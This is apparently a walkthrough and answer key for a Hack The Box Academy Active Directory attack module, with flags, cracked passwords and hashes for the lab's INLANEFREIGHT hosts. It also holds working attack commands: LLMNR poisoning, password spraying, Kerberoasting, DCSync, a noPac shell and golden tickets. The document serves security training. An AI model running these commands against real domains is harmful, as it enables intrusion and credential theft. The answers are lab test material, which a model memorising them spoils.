Active Directory Enumeration & Attacks

External Recon and Enumeration Principles

Q1) While looking at inlanefreight's public records, a flag can be seen. Find the flag and submit it. (format == HTB{******})

nslookup -type=TXT inlanefreight.com

Answer: HTB{5Fz6UPNUFFzqjdg0AzXyxCjMZ}

Initial Enumeration of the Domain

Identifying Hosts

Let's begin by monitoring the network to gain insight into current activity. Using tools like Wireshark and TCPDump, we can analyze the traffic and identify active hosts and the types of communications occurring across the network.

sudo -E wireshark                              # Using Wireshark
sudo tcpdump -i ens224                         # Using Tcpdump

Starting Responder

Responder is a tool built to listen, analyze, and poison LLMNR, NBT-NS, and MDNS requests and responses.

sudo responder -I ens224 -A 

FPing Active Checks

fping -asgq 172.16.5.0/23

Kerbrute - Internal AD Username Enumeration

kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jjsmith.txt -o valid_ad_users

Q1) From your scans, what is the "commonName" of host 172.16.5.5?

sudo nmap -v -A -iL hosts.txt -oN /home/htb-student/Documents/host-enum

Answer: ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

Q2) What host is running "Microsoft SQL Server 2019 15.00.2000.00"? (IP address, not Resolved name)

sudo nmap -v -A -iL hosts.txt -oN /home/htb-student/Documents/host-enum

Answer: 172.16.5.130

LLMNR/NBT-NS Poisoning - from Linux

Q1) Run Responder and obtain a hash for a user account that starts with the letter b. Submit the account name as your answer.

sudo responder -I ens224 

Answer: backupagent

Q2) Crack the hash for the previous account and submit the cleartext password as your answer.

sudo hashcat -m 5600 backupagent_NTLMv2 /usr/share/wordlists/rockyou.txt

Answer: h1backup55

Q3) Run Responder and obtain an NTLMv2 hash for the user wley. Crack the hash using Hashcat and submit the user's password as your answer.

sudo hashcat -m 5600 wley_NTLMv2 /usr/share/wordlists/rockyou.txt

Answer: transporter@4

LLMNR/NBT-NS Poisoning - from Windows

Using Inveigh

Import-Module .\Inveigh.ps1
Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y

C# Inveigh (InveighZero)

.\Inveigh.exe

Q1) Run Inveigh and capture the NTLMv2 hash for the svc_qualys account. Crack and submit the cleartext password as the answer.

.\Inveigh.exe
GET NTLMV2UNIQUE
sudo hashcat -m 5600 svc_qualys /usr/share/wordlists/rockyou.txt

Answer: security#1

Enumerating & Retrieving Password Policies

Enumerating the Password Policy - from Linux - Credentialed

crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol

SMB NULL Sessions

rpcclient -U "" -N 172.16.5.5
getdompwinfo

Using enum4linux

enum4linux -P 172.16.5.5

Using enum4linux-ng

enum4linux-ng -P 172.16.5.5 -oA ilfreight

Enumerating the Password Policy - from Linux - LDAP Anonymous Bind

ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

Enumerating the Password Policy - from Windows

net use \\DC01\ipc$ "" /u:""
net accounts
Get-DomainPolicy                     # From PowerView

Q1) What is the default Minimum password length when a new domain is created? (One number)

Answer: 7

Q2) What is the minPwdLength set to in the INLANEFREIGHT.LOCAL domain? (One number)

crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol

Answer: 8

Password Spraying - Making a Target User List

SMB NULL Session to Pull User List

enum4linux -U 172.16.5.5  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"

Using rpcclient

rpcclient -U "" -N 172.16.5.5

Using CrackMapExec --users Flag

crackmapexec smb 172.16.5.5 --users

Gathering Users with LDAP Anonymous

ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))"  | grep sAMAccountName: | cut -f2 -d" "
./windapsearch.py --dc-ip 172.16.5.5 -u "" -U

Q1) Enumerate valid usernames using Kerbrute and the wordlist located at /opt/jsmith.txt on the ATTACK01 host. How many valid usernames can we enumerate with just this wordlist from an unauthenticated standpoint?

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt 

Answer: 56

Internal Password Spraying - from Linux

Using a Bash one-liner for the Attack

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

Using Kerbrute for the Attack

kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1

Using CrackMapExec & Filtering Logon Failures

sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

Validating the Credentials with CrackMapExec

sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123

Local Admin Spraying with CrackMapExec

sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

The --local-auth flag tells the tool to attempt a single login on each machine against its local account database, which removes any risk of domain account lockout. Make sure this flag is set so we don't potentially lock out the built-in administrator account for the domain.

Q1) Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer.

for u in $(cat valid_usernames.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
sudo crackmapexec smb 172.16.5.5 -u sgage -p Welcome1

Answer: sgage

Internal Password Spraying - from Windows

Q1) Using the examples shown in this section, find a user with the password Winter2022. Submit the username as the answer.

Invoke-DomainPasswordSpray -Password Winter2022 -OutFile spray_success -ErrorAction SilentlyContinue

Answer: dbranch

Enumerating Security Controls

Checking the Status of Defender with Get-MpComputerStatus

Get-MpComputerStatus

Using Get-AppLockerPolicy cmdlet

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Enumerating Language Mode

$ExecutionContext.SessionState.LanguageMode

LAPS

The Microsoft Local Administrator Password Solution (LAPS) is used to randomize and rotate local administrator passwords on Windows hosts and prevent lateral movement.

Enumerating LAPS

Find-LAPSDelegatedGroups
Find-AdmPwdExtendedRights
Get-LAPSComputers

Credentialed Enumeration - from Linux

CME - Domain User Enumeration

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users

CME - Domain Group Enumeration

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups

CME - Logged On Users

sudo crackmapexec smb 172.16.5.130 -u forend -p Klmcargo2 --loggedon-users

CME Share Searching

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares

Spider_plus

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'

SMBMap To Check Access

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5

Recursive List Of All Directories

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R 'Department Shares' --dir-only

SMB NULL Session with rpcclient

rpcclient -U "" -N 172.16.5.5

RPCClient User Enumeration By RID

queryuser 0x457

Enumdomusers

enumdomusers

Impacket Toolkit

psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125  
wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5  
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da   # Windapsearch - Domain Admins
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU    # Windapsearch - Privileged Users

Bloodhound.py

sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all 

Q1) What AD User has a RID equal to Decimal 1170?

Let's begin by converting this number from decimal to hexadecimal, since rpcclient expects the RID in hex: 1170 decimal is 0x492.

queryuser 0x492

Answer: mmorgan

Q2) What is the membercount: of the "Interns" group?

sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups | grep -i "interns"

Credentialed Enumeration - from Windows

Get Domain Info

Import-Module ActiveDirectory
Get-ADDomain
Get-ADUser -Filter *

Checking For Trust Relationships

Get-ADTrust -Filter *

Group Enumeration

Get-ADGroup -Filter * | select name

Detailed Group Info

Get-ADGroup -Identity "Backup Operators"

PowerView

Command                            Description
Export-PowerViewCSV                Append results to a CSV file
ConvertTo-SID                      Convert a user or group name to its SID value
Get-DomainSPNTicket                Requests the Kerberos ticket for a specified Service Principal Name (SPN) account

Domain/LDAP Functions:
Get-Domain                         Will return the AD object for the current (or specified) domain
Get-DomainController               Return a list of the Domain Controllers for the specified domain
Get-DomainUser                     Will return all users or specific user objects in AD
Get-DomainComputer                 Will return all computers or specific computer objects in AD
Get-DomainGroup                    Will return all groups or specific group objects in AD
Get-DomainOU                       Search for all or specific OU objects in AD
Find-InterestingDomainAcl          Finds object ACLs in the domain with modification rights set to non-built-in objects
Get-DomainGroupMember              Will return the members of a specific domain group
Get-DomainFileServer               Returns a list of servers likely functioning as file servers
Get-DomainDFSShare                 Returns a list of all distributed file systems for the current (or specified) domain

GPO Functions:
Get-DomainGPO                      Will return all GPOs or specific GPO objects in AD
Get-DomainPolicy                   Returns the default domain policy or the domain controller policy for the current domain

Computer Enumeration Functions:
Get-NetLocalGroup                  Enumerates local groups on the local or a remote machine
Get-NetLocalGroupMember            Enumerates members of a specific local group
Get-NetShare                       Returns open shares on the local (or a remote) machine
Get-NetSession                     Will return session information for the local (or a remote) machine
Test-AdminAccess                   Tests if the current user has administrative access to the local (or a remote) machine

Threaded 'Meta'-Functions:
Find-DomainUserLocation            Finds machines where specific users are logged in
Find-DomainShare                   Finds reachable shares on domain machines
Find-InterestingDomainShareFile    Searches for files matching specific criteria on readable shares in the domain
Find-LocalAdminAccess              Find machines on the local domain where the current user has local administrator access

Domain Trust Functions:
Get-DomainTrust                    Returns domain trusts for the current domain or a specified domain
Get-ForestTrust                    Returns all forest trusts for the current forest or a specified forest
Get-DomainForeignUser              Enumerates users who are in groups outside of the user's domain
Get-DomainForeignGroupMember       Enumerates groups with users outside of the group's domain and returns each foreign member
Get-DomainTrustMapping             Will enumerate all trusts for the current domain and any others seen

Domain User Information

Get-DomainUser -Identity mmorgan -Domain inlanefreight.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol

Recursive Group Membership

Get-DomainGroupMember -Identity "Domain Admins" -Recurse

Trust Enumeration

Get-DomainTrustMapping

Testing for Local Admin Access

Test-AdminAccess -ComputerName ACADEMY-EA-MS01

Finding Users With SPN Set

Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName

SharpView

Here we can use SharpView to enumerate information about a specific user, such as the user forend, which we control.

.\SharpView.exe Get-DomainUser -Identity forend

Snaffler

Snaffler is a tool that can help us acquire credentials or other sensitive data in an Active Directory environment. Snaffler works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories.

.\Snaffler.exe  -d INLANEFREIGHT.LOCAL -s -v data

Q1) Using Bloodhound, determine how many Kerberoastable accounts exist within the INLANEFREIGHT domain.

Import-Module .\PowerView.ps1
Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName

Q2) What PowerView function allows us to test if a user has administrative access to a local or remote host?

Test-AdminAccess -ComputerName ACADEMY-EA-MS01

Answer: Test-AdminAccess

Q3) Run Snaffler and hunt for a readable web config file. What is the name of the user in the connection string within the file?

.\Snaffler.exe  -d INLANEFREIGHT.LOCAL -s -v data

Answer: sa

Q4) What is the password for the database user?

Answer: ILFREIGHTDB01!

Living Off the Land

Q1) Enumerate the host's security configuration information and provide its AMProductVersion.

Get-MpComputerStatus

Q2) What domain user is explicitly listed as a member of the local Administrators group on the target host?

net localgroup administrators

Answer: adunn

Q3) Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))" -attr distinguishedName userAccountControl description

Answer: HTB{LD@P_I$_W1ld}

Kerberoasting - from Linux

Q1) Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer.

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user SAPService
hashcat -m 13100 SAPService /usr/share/wordlists/rockyou.txt

Answer: !SapperFi2

Q2) What powerful local group on the Domain Controller is the SAPService user a member of?

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/SAPService | grep 'SAPService'

Answer: Account Operators

Kerberoasting - from Windows

Q1) What is the name of the service account with the SPN 'vmware/inlanefreight.local'?

Get-DomainUser * -spn | select samaccountname

Answer: svc_vmwaresso

Q2) Crack the password for this account and submit it as your answer.

.\Rubeus.exe kerberoast /user:svc_vmwaresso /nowrap
hashcat -m 13100 svc_vm_tgs /usr/share/wordlists/rockyou.txt

Answer: Virtual01

Access Control List (ACL) Abuse Primer

Q1) What type of ACL defines which security principals are granted or denied access to an object? (one word)

Answer: DACL

Q2) Which ACE entry can be leveraged to perform a targeted Kerberoasting attack?

Answer: GenericAll

ACL Enumeration

Q1) What is the rights GUID for User-Force-Change-Password?

$sid = Convert-NameToSid wley
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}   # ObjectAceType resolved to its name (User-Force-Change-Password)
$sid = Convert-NameToSid wley
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}                 # without -ResolveGUIDs, ObjectAceType shows the raw rights GUID

Or from here: https://learn.microsoft.com/en-us/windows/win32/adschema/r-user-force-change-password

Answer: 00299570-246d-11d0-a768-00aa006e0529

Q2) What flag can we use with PowerView to show us the ObjectAceType in a human-readable format during our enumeration?

Answer: ResolveGUIDs

Q3) What privileges does the user damundsen have over the Help Desk Level 1 group?

$sid2 = Convert-NameToSid damundsen
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose

Answer: GenericWrite

Q4) Using the skills learned in this section, enumerate the ActiveDirectoryRights that the user forend has over the user dpayne (Dagmar Payne).

$sid2 = Convert-NameToSid forend
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2}

Answer: GenericAll

Q5) What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)

.\SharpHound.exe -c All --zipfilename ILFREIGHT

Next, let's upload this ZIP file to the BloodHound GUI for analysis.

I selected FOREND@INLANEFREIGHT.LOCAL as the starting node. Then, from the Node Info tab, I scrolled down to the Outbound Control Rights section, followed by First Degree Object Control.

Answer: Self-Membership

ACL Abuse Tactics

Q1) Work through the examples in this section to gain a better understanding of ACL abuse and performing these skills hands-on. Set a fake SPN for the adunn account, Kerberoast the user, and crack the hash using Hashcat. Submit the account's cleartext password as your answer.

Given that we have GenericAll permissions on this account, we can conduct a targeted Kerberoasting attack by modifying the account's servicePrincipalName (SPN) attribute to register a fake SPN. This will allow us to request a Ticket Granting Service (TGS) ticket, which we can then extract and attempt to crack offline using Hashcat.

Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
.\Rubeus.exe kerberoast /user:adunn /nowrap

Let's save this TGS to a file and attempt to crack it using Hashcat.

hashcat -m 13100 adunn_TGS /usr/share/wordlists/rockyou.txt

Answer: SyncMaster757

DCSync

Q1) Perform a DCSync attack and look for another user with the option "Store password using reversible encryption" set. Submit the username as your answer.

Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl

Answer: syncron

Q2) What is this user's cleartext password?

secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 

Answer: Mycleart3xtP@ss!

Q3) Perform a DCSync attack and submit the NTLM hash for the khartsfield user as your answer.

secretsdump.py -outputfile inlanefreight_hashes -just-dc-user khartsfield INLANEFREIGHT/adunn@172.16.5.5 

Answer: 4bb3b317845f0954200a6b0acc9b9f9a

Privileged Access

Q1) What other user in the domain has CanPSRemote rights to a host?

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

Answer: bdavis

Q2) What host can this user access via WinRM? (just the computer name)

Answer: ACADEMY-EA-DC01

Q3) Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.

mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth

Answer: 1m_the_sQl_@dm1n_n0w!

Bleeding Edge Vulnerabilities

Q1) Which two CVEs indicate NoPac.py may work? (Format: ####-#####&####-#####, no spaces)

Answer: 2021-42278&2021-42287

Q2) Apply what was taught in this section to gain a shell on DC01. Submit the contents of flag.txt located in the DailyTasks directory on the Administrator's desktop.

First, let's determine whether the system is vulnerable.

sudo python3 /opt/noPac/scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap

Next, we will attempt to obtain a shell with SYSTEM-level privileges by executing noPac.py. This tool allows us to impersonate the built-in Administrator account and initiate a semi-interactive shell session on the target Domain Controller.

sudo python3 /opt/noPac/noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

Answer: D0ntSl@ckonN0P@c!

Miscellaneous Misconfigurations

Q1) Find another user with the passwd_notreqd field set. Submit the samaccountname as your answer. The samaccountname starts with the letter "y".

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Answer: ygroce

Q2) Find another user with the "Do not require Kerberos pre-authentication setting" enabled. Perform an ASREPRoasting attack against this user, crack the hash, and submit their cleartext password as your answer.

First, let's find the users that do not require Kerberos pre-authentication.

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

Next, let's retrieve the AS-REP in the proper format for offline hash cracking.

.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat
hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt

Answer: Pass@word
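As an added example that is not part of the course material, the following Python ties together the userAccountControl bits behind the dsquery filter, the Get-ADUser -band 128 check and the PowerView -UACFilter / -PreauthNotRequired searches above: it decodes the flags, builds the bitwise LDAP filter (generalised to an any-of variant using the OR matching rule), and audits constructed sample accounts for the weak settings this module hunts for. The sample records and function names are my own; the flag values and rule OIDs are Microsoft's documented ones.

```python
"""Decode userAccountControl flags and build the LDAP filters used above.
Added example, not course material; sample accounts are constructed."""

# userAccountControl bits referenced by the dsquery, Get-ADUser and PowerView commands above
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "PASSWD_NOTREQD": 0x0020,
    "ENCRYPTED_TEXT_PWD_ALLOWED": 0x0080,  # "Store password using reversible encryption"
    "NORMAL_ACCOUNT": 0x0200,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "DONT_REQ_PREAUTH": 0x400000,          # "Do not require Kerberos preauthentication"
}

# LDAP extensible-match rules: AND matches when every bit of the mask is set,
# OR matches when any bit of the mask is set.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"
LDAP_MATCHING_RULE_BIT_OR = "1.2.840.113556.1.4.804"


def decode_uac(value: int) -> list[str]:
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for name, bit in sorted(UAC_FLAGS.items(), key=lambda kv: kv[1])
            if value & bit]


def uac_filter(flags: list[str], match: str = "all") -> str:
    """Build a user-object LDAP filter for the given flags.

    match="all" uses the bitwise-AND rule with the combined mask (the form the
    dsquery command above uses for ACCOUNTDISABLE); match="any" uses the OR rule.
    """
    mask = 0
    for name in flags:
        mask |= UAC_FLAGS[name]  # KeyError on an unknown flag name is intentional
    rule = LDAP_MATCHING_RULE_BIT_AND if match == "all" else LDAP_MATCHING_RULE_BIT_OR
    return (f"(&(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:{rule}:={mask}))")


def audit_accounts(accounts: list[dict]) -> list[tuple[str, str]]:
    """Report the weak settings hunted for in this module as (sAMAccountName, finding).

    Reversible encryption and PASSWD_NOTREQD weaken the credential itself,
    DONT_REQ_PREAUTH exposes the account to AS-REP roasting, and a disabled
    account with adminCount=1 is the pattern behind the dsquery search above.
    """
    findings = []
    for acct in accounts:
        uac, name = acct["userAccountControl"], acct["sAMAccountName"]
        if uac & UAC_FLAGS["ENCRYPTED_TEXT_PWD_ALLOWED"]:
            findings.append((name, "password stored with reversible encryption"))
        if uac & UAC_FLAGS["PASSWD_NOTREQD"]:
            findings.append((name, "password not required"))
        if uac & UAC_FLAGS["DONT_REQ_PREAUTH"]:
            findings.append((name, "Kerberos pre-authentication not required"))
        if uac & UAC_FLAGS["ACCOUNTDISABLE"] and acct.get("adminCount") == 1:
            findings.append((name, "disabled privileged account, description: "
                             + repr(acct.get("description", ""))))
    return findings


# Constructed sample records in the shape an LDAP search returns (not lab data)
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc_legacy", "userAccountControl": 0x200 | 0x80, "adminCount": 0},
    {"sAMAccountName": "contractor1", "userAccountControl": 0x200 | 0x20, "adminCount": 0},
    {"sAMAccountName": "appsvc", "userAccountControl": 0x200 | 0x400000, "adminCount": 0},
    {"sAMAccountName": "old_admin", "userAccountControl": 0x200 | 0x2, "adminCount": 1,
     "description": "retired helpdesk admin"},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200 | 0x10000, "adminCount": 0},
]

if __name__ == "__main__":
    print(uac_filter(["ACCOUNTDISABLE"]))
    for acct in SAMPLE_ACCOUNTS:
        print(f"{acct['sAMAccountName']:<12} {decode_uac(acct['userAccountControl'])}")
    for name, finding in audit_accounts(SAMPLE_ACCOUNTS):
        print(f"{name}: {finding}")
```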

Domain Trusts Primer

Q1) What is the child domain of INLANEFREIGHT.LOCAL? (format: FQDN, i.e., DEV.ACME.LOCAL)

Import-Module ActiveDirectory
Get-ADTrust -Filter *

Answer: LOGISTICS.INLANEFREIGHT.LOCAL

Q2) What domain does the INLANEFREIGHT.LOCAL domain have a forest transitive trust with?

Answer: FREIGHTLOGISTICS.LOCAL

Q3) What direction is this trust?

Answer: Bidirectional

Attacking Domain Trusts - Child -> Parent Trusts - from Windows

Q1) What is the SID of the child domain?

Import-Module .\PowerView.ps1
Get-DomainSID

Answer: S-1-5-21-2806153819-209893948-922872689

Q2) What is the SID of the Enterprise Admins group in the root domain?

Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

Answer: S-1-5-21-3842939050-3880317879-2865463114-519

Q3) Perform the ExtraSids attack to compromise the parent domain. Submit the contents of the flag.txt file located in the c:\ExtraSids folder on the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL domain controller in the parent domain.

First, let's retrieve the hash of the krbtgt account.

.\mimikatz.exe
lsadump::dcsync /user:LOGISTICS\krbtgt

We now have the krbtgt hash, the SID of the Enterprise Admins group, and the SID of the child domain, which enables us to create a Golden Ticket.

kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

Now we can retrieve the flag.

cat \\academy-ea-dc01.inlanefreight.local\c$\ExtraSids\flag.txt

Answer: f@ll1ng_l1k3_d0m1no3$

Attacking Domain Trusts - Child -> Parent Trusts - from Linux

Q1) Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.

First, let's retrieve the hash of the krbtgt account.

secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

Next, we need to get the SID of the child domain.

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 

Next, we can rerun the command, targeting the INLANEFREIGHT Domain Controller (DC01) at 172.16.5.5, and grab the parent domain's SID from the lines around the Enterprise Admins entry.

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

Next, we can use ticketer.py from the Impacket toolkit to generate a Golden Ticket, which grants access to resources in both the child and parent domains.

ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

The ticket will be stored in our system as a credential cache (ccache) file, which holds Kerberos credentials. By setting the KRB5CCNAME environment variable, the system is directed to use this file for Kerberos authentication.

export KRB5CCNAME=hacker.ccache 

Now, we need to check if we can successfully authenticate to the parent domain's Domain Controller.

psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

Impacket also has the tool raiseChild.py, which will automate escalating from child to parent domain.

raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm

Let's retrieve the NTLM hash for the domain administrator account, bross.

secretsdump.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5 | grep "bross"

Answer: 49a074a39dd0651f647e765c2cc794c7

Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows

Q1) Perform a cross-forest Kerberoast attack and obtain the TGS for the mssqlsvc user. Crack the ticket and submit the account's cleartext password as your answer.

We can use PowerView to enumerate accounts within the target domain that have associated Service Principal Names (SPNs).

Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName

Let's perform a Kerberoasting attack across the trust using Rubeus.

.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap

Let's save the hash to a file and attempt to crack it using Hashcat in order to retrieve the plaintext password.

hashcat -m 13100 mssqlsvc_tgs /usr/share/wordlists/rockyou.txt

Answer: 1logistics

Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux

Q1) Kerberoast across the forest trust from the Linux attack host. Submit the name of another account with an SPN aside from MSSQLsvc.

We obtained the password for the user account wley earlier: transporter@4.

GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley

Answer: sapsso

Q2) Crack the TGS and submit the cleartext password as your answer.

GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
hashcat -m 13100 sapsso_tgs /usr/share/wordlists/rockyou.txt

Answer: pabloPICASSO

Q3) Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop.

psexec.py ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL/sapsso:pabloPICASSO@172.16.5.238

Answer: burn1ng_d0wn_th3_f0rest!
